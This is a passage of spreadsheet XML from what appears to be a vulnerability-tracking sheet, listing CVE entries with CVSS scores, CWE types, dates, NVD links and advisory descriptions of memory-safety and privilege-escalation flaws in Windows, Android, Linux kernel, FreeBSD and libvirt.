        <is>
          <t>CVE-2026-5729</t>
        </is>
      </c>
      <c r="C2086" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2086" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2086" s="5" t="inlineStr"/>
      <c r="F2086" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2086" s="5" t="inlineStr"/>
      <c r="H2086" s="5" t="inlineStr"/>
      <c r="I2086" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2086" s="5" t="inlineStr"/>
      <c r="K2086" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2086" s="5" t="inlineStr">
        <is>
          <t>Use After Free vulnerability in Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform valid GPU processing operations to access already freed memory.
This issue affects Valhall GPU Kernel Driver: from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="M2086" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5729</t>
        </is>
      </c>
    </row>
    <row r="2087">
      <c r="A2087" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2087" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58097</t>
        </is>
      </c>
      <c r="C2087" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2087" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2087" s="5" t="inlineStr"/>
      <c r="F2087" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2087" s="5" t="inlineStr"/>
      <c r="H2087" s="5" t="inlineStr">
        <is>
          <t>freebsd:freebsd</t>
        </is>
      </c>
      <c r="I2087" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2087" s="5" t="inlineStr"/>
      <c r="K2087" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-130</t>
        </is>
      </c>
      <c r="L2087" s="5" t="inlineStr">
        <is>
          <t>mp_SetEnddisc() copied a user-supplied PSN endpoint value without length validation, allowing a buffer overflow via the ppp(8) command interface.
A local user with access to the ppp(8) command interface can crash ppp(8) or potentially execute arbitrary code as root.</t>
        </is>
      </c>
      <c r="M2087" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58097</t>
        </is>
      </c>
    </row>
    <row r="2088">
      <c r="A2088" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2088" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58599</t>
        </is>
      </c>
      <c r="C2088" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2088" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2088" s="5" t="inlineStr"/>
      <c r="F2088" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2088" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2088" s="5" t="inlineStr"/>
      <c r="I2088" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2088" s="5" t="inlineStr"/>
      <c r="K2088" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2088" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2088" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58599</t>
        </is>
      </c>
    </row>
    <row r="2089">
      <c r="A2089" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2089" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58600</t>
        </is>
      </c>
      <c r="C2089" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2089" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2089" s="5" t="inlineStr"/>
      <c r="F2089" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2089" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2089" s="5" t="inlineStr"/>
      <c r="I2089" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2089" s="5" t="inlineStr"/>
      <c r="K2089" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2089" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2089" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58600</t>
        </is>
      </c>
    </row>
    <row r="2090">
      <c r="A2090" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2090" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58611</t>
        </is>
      </c>
      <c r="C2090" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2090" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2090" s="5" t="inlineStr"/>
      <c r="F2090" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2090" s="5" t="inlineStr"/>
      <c r="H2090" s="5" t="inlineStr"/>
      <c r="I2090" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2090" s="5" t="inlineStr"/>
      <c r="K2090" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L2090" s="5" t="inlineStr">
        <is>
          <t>Improper authorization in XBox Gaming Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2090" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58611</t>
        </is>
      </c>
    </row>
    <row r="2091">
      <c r="A2091" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2091" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58820</t>
        </is>
      </c>
      <c r="C2091" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2091" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2091" s="5" t="inlineStr"/>
      <c r="F2091" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2091" s="5" t="inlineStr"/>
      <c r="H2091" s="5" t="inlineStr"/>
      <c r="I2091" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2091" s="5" t="inlineStr"/>
      <c r="K2091" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2091" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible memory safety issue due to integer overflow. This could lead to local escalation of privilege with no additional execution privileges required.</t>
        </is>
      </c>
      <c r="M2091" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58820</t>
        </is>
      </c>
    </row>
    <row r="2092">
      <c r="A2092" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2092" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58823</t>
        </is>
      </c>
      <c r="C2092" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2092" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2092" s="5" t="inlineStr"/>
      <c r="F2092" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2092" s="5" t="inlineStr"/>
      <c r="H2092" s="5" t="inlineStr"/>
      <c r="I2092" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2092" s="5" t="inlineStr"/>
      <c r="K2092" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L2092" s="5" t="inlineStr">
        <is>
          <t>In stpropnci_process_std of stpropnci_std.cc, there is a possible memory safety issue due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2092" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58823</t>
        </is>
      </c>
    </row>
    <row r="2093">
      <c r="A2093" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2093" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58839</t>
        </is>
      </c>
      <c r="C2093" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2093" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2093" s="5" t="inlineStr"/>
      <c r="F2093" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2093" s="5" t="inlineStr"/>
      <c r="H2093" s="5" t="inlineStr"/>
      <c r="I2093" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2093" s="5" t="inlineStr"/>
      <c r="K2093" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L2093" s="5" t="inlineStr">
        <is>
          <t>In forEachLine of MountRegistry.cpp, there is a possible out of bounds read due to a buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2093" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58839</t>
        </is>
      </c>
    </row>
    <row r="2094">
      <c r="A2094" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2094" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58846</t>
        </is>
      </c>
      <c r="C2094" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2094" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2094" s="5" t="inlineStr"/>
      <c r="F2094" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2094" s="5" t="inlineStr"/>
      <c r="H2094" s="5" t="inlineStr"/>
      <c r="I2094" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2094" s="5" t="inlineStr"/>
      <c r="K2094" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2094" s="5" t="inlineStr">
        <is>
          <t>In kvm_iommu_map_sg of iommu.c, there is a possible use after free due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2094" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58846</t>
        </is>
      </c>
    </row>
    <row r="2095">
      <c r="A2095" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2095" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58874</t>
        </is>
      </c>
      <c r="C2095" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2095" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2095" s="5" t="inlineStr"/>
      <c r="F2095" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2095" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2095" s="5" t="inlineStr"/>
      <c r="I2095" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2095" s="5" t="inlineStr"/>
      <c r="K2095" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2095" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of SmsController.java, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2095" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58874</t>
        </is>
      </c>
    </row>
    <row r="2096">
      <c r="A2096" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2096" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58941</t>
        </is>
      </c>
      <c r="C2096" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2096" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2096" s="5" t="inlineStr"/>
      <c r="F2096" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2096" s="5" t="inlineStr"/>
      <c r="H2096" s="5" t="inlineStr"/>
      <c r="I2096" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2096" s="5" t="inlineStr"/>
      <c r="K2096" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2096" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of iommu.c, there is a possible out of bounds read/write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2096" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58941</t>
        </is>
      </c>
    </row>
    <row r="2097">
      <c r="A2097" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2097" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62697</t>
        </is>
      </c>
      <c r="C2097" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2097" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2097" s="5" t="inlineStr"/>
      <c r="F2097" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2097" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2097" s="5" t="inlineStr"/>
      <c r="I2097" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2097" s="5" t="inlineStr"/>
      <c r="K2097" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2097" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2097" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62697</t>
        </is>
      </c>
    </row>
    <row r="2098">
      <c r="A2098" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2098" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62804</t>
        </is>
      </c>
      <c r="C2098" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2098" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2098" s="5" t="inlineStr"/>
      <c r="F2098" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2098" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2098" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2098" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2098" s="5" t="inlineStr"/>
      <c r="K2098" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L2098" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Microsoft Office Word allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2098" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62804</t>
        </is>
      </c>
    </row>
    <row r="2099">
      <c r="A2099" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2099" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62810</t>
        </is>
      </c>
      <c r="C2099" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2099" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2099" s="5" t="inlineStr"/>
      <c r="F2099" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2099" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H2099" s="5" t="inlineStr"/>
      <c r="I2099" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2099" s="5" t="inlineStr"/>
      <c r="K2099" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2099" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2099" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62810</t>
        </is>
      </c>
    </row>
    <row r="2100">
      <c r="A2100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62886</t>
        </is>
      </c>
      <c r="C2100" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2100" s="5" t="inlineStr"/>
      <c r="F2100" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2100" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, .net</t>
        </is>
      </c>
      <c r="H2100" s="5" t="inlineStr">
        <is>
          <t>microsoft:.net, microsoft:visual_studio_2022, microsoft:visual_studio_2026, microsoft:windows</t>
        </is>
      </c>
      <c r="I2100" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2100" s="5" t="inlineStr"/>
      <c r="K2100" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L2100" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in .NET allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62886</t>
        </is>
      </c>
    </row>
    <row r="2101">
      <c r="A2101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63622</t>
        </is>
      </c>
      <c r="C2101" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2101" s="5" t="inlineStr"/>
      <c r="F2101" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2101" s="5" t="inlineStr"/>
      <c r="H2101" s="5" t="inlineStr"/>
      <c r="I2101" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2101" s="5" t="inlineStr"/>
      <c r="K2101" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2101" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libvirt. A local attacker, specifically a process running as the confined `swtpm` user, could exploit a symlink-following vulnerability in the `virFileChownFiles()` function. By planting a symbolic link within the `swtpm` state directory, the attacker could trick the root-level libvirt daemon into changing the ownership of an arbitrary file to the `swtpm` user. This allows for privilege escalation from the `swtpm` sandbox to root-level file ownership control.</t>
        </is>
      </c>
      <c r="M2101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63622</t>
        </is>
      </c>
    </row>
    <row r="2102">
      <c r="A2102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64372</t>
        </is>
      </c>
      <c r="C2102" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2102" s="5" t="inlineStr"/>
      <c r="F2102" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2102" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2102" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2102" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J2102" s="5" t="inlineStr"/>
      <c r="K2102" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2102" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: pcc: fix use-after-free and double free in _OSC evaluation
pcc_cpufreq_do_osc() calls acpi_evaluate_object() twice for the
two-phase _OSC negotiation. Between the two calls it freed
output.pointer but left output.length unchanged. Since
acpi_evaluate_object() treats a non-zero length with a non-NULL
pointer as an existing buffer to write into, the second call wrote
into freed memory (use-after-free). The subsequent kfree(output.pointer)
at out_free then freed the same pointer a second time (double free).
Reset output.pointer to NULL and output.length to ACPI_ALLOCATE_BUFFER
after freeing the first result, so ACPICA allocates a fresh buffer for
each phase independently.</t>
        </is>
      </c>
      <c r="M2102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64372</t>
        </is>
      </c>
    </row>
    <row r="2103">
      <c r="A2103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64375</t>
        </is>
      </c>
      <c r="C2103" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2103" s="5" t="inlineStr"/>
      <c r="F2103" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2103" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2103" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2103" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J2103" s="5" t="inlineStr"/>
      <c r="K2103" s="5" t="inlineStr"/>
      <c r="L2103" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
proc: protect ptrace_may_access() with exec_update_lock (FD links)
proc_pid_get_link() and proc_pid_readlink() currently look up the task from
the pid once, then do the ptrace access check on that task, then look up
the task from the pid a second time to do the actual access.
That's racy in several ways.
To fix it, pass the task to the -&gt;proc_get_link() handler, and instead of
proc_fd_access_allowed(), introduce a new helper call_proc_get_link() that
looks up and locks the task, does the access check, and calls
-&gt;proc_get_link().</t>
        </is>
      </c>
      <c r="M2103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64375</t>
        </is>
      </c>
    </row>
    <row r="2104">
      <c r="A2104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64377</t>
        </is>
      </c>
      <c r="C2104" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2104" s="5" t="inlineStr"/>
      <c r="F2104" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2104" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2104" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2104" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J2104" s="5" t="inlineStr"/>
      <c r="K2104" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L2104" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: qcom-cpufreq-hw: Fix possible double free
qcom_cpufreq.data is allocated with devm_kzalloc() in probe() as an
array of per-domain data. qcom_cpufreq_hw_cpu_init() stores a pointer to
one element of this array in policy-&gt;driver_data.
qcom_cpufreq_hw_cpu_exit() currently calls kfree() on policy-&gt;driver_data.
This is not valid because the memory is devm-managed. For the first
domain, this can free the devm-managed allocation while the devres entry
is still active, leading to a possible double free when the platform
device is later detached. For other domains, the pointer may refer to an
element inside the array rather than the allocation base.
Remove the kfree(data) call and let devres release qcom_cpufreq.data.
This issue was found by a static analysis tool I am developing.</t>
        </is>
      </c>
      <c r="M2104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64377</t>
        </is>
      </c>
    </row>
    <row r="2105">
      <c r="A2105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64378</t>
        </is>
      </c>
      <c r="C2105" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2105" s="5" t="inlineStr"/>
      <c r="F2105" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2105" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2105" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2105" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J2105" s="5" t="inlineStr"/>
      <c r="K2105" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2105" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
writeback: fix race between cgroup_writeback_umount() and inode_switch_wbs()
When a container exits, the following BUG_ON() is occasionally triggered:
==================================================================
 VFS: Busy inodes after unmount of sdb (ext4)
 ------------[ cut here ]------------
 kernel BUG at fs/super.c:695!
 CPU: 3 PID: 6 Comm: containerd-shim Tainted: G OE K 6.6 #1
 pstate: 63400009 (nZCv daif +PAN -UAO +TCO +DIT -SSBS BTYPE=--)
 pc : generic_shutdown_super+0xf0/0x100
 lr : generic_shutdown_super+0xf0/0x100
 Call trace:
  generic_shutdown_super+0xf0/0x100
  kill_block_super+0x20/0x48
  ext4_kill_sb+0x28/0x60
  deactivate_locked_super+0x54/0x130
  deactivate_super+0x84/0xa0
  cleanup_mnt+0xa4/0x140
  __cleanup_mnt+0x18/0x28
  task_work_run+0x78/0xe0
  do_notify_resume+0x204/0x240
==================================================================
The root cause is a race between cgroup_writeback_umount() and
inode_switch_wbs()/cleanup_offline_cgwb(). There is a window between
inode_prepare_wbs_switch() returning true and the subsequent
wb_queue_isw() call. Following is the process that triggers the issue:
      CPU A (umount)           |          CPU B (writeback)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                 inode_switch_wbs/cleanup_offline_cgwb
                                  atomic_inc(&amp;isw_nr_in_flight)
                                  inode_prepare_wbs_switch
                                   -&gt; passes SB_ACTIVE check
                                   __iget(inode)
 generic_shutdown_super
  sb-&gt;s_flags &amp;= ~SB_ACTIVE
  cgroup_writeback_umount(sb)
   smp_mb()
   atomic_read(&amp;isw_nr_in_flight)
   rcu_barrier()
    -&gt; no pending RCU callbacks
   flush_workqueue(isw_wq)
    -&gt; nothing queued, returns
  evict_inodes(sb)
   -&gt; Inode skipped as isw still holds a ref.
  sop-&gt;put_super(sb)
   /* destroys percpu counters */
  -&gt; VFS: Busy inodes after unmount!
                                  wb_queue_isw()
                                   queue_work(isw_wq, ...)
                                  /* later in work function */
                                  inode_switch_wbs_work_fn
                                   process_inode_switch_wbs
                                    iput() -&gt; evict
                                     percpu_counter_dec() // UAF!
Fix this by extending the RCU read-side critical section in
inode_switch_wbs() and cleanup_offline_cgwb() to cover from
inode_prepare_wbs_switch() through wb_queue_isw().  Since there is
no sleep in this window, rcu_read_lock() can be used.  Then add a
synchronize_rcu() in cgroup_writeback_umount() before the existing
rcu_barrier(), so that all in-flight switchers that have passed the
SB_ACTIVE check have completed queue_work() before flush_workqueue()
is called.
The existing rcu_barrier() is intentionally retained so this fix can
be backported unchanged to stable kernels (5.10.y, 6.6.y, ...) that
still queue switches via queue_rcu_work(). It is a no-op on current
mainline (since commit e1b849cfa6b6 ("writeback: Avoid contention on
wb-&gt;list_lock when switching inodes")) and is removed in a follow-up
patch.</t>
        </is>
      </c>
      <c r="M2105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64378</t>
        </is>
      </c>
    </row>
    <row r="2106">
      <c r="A2106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
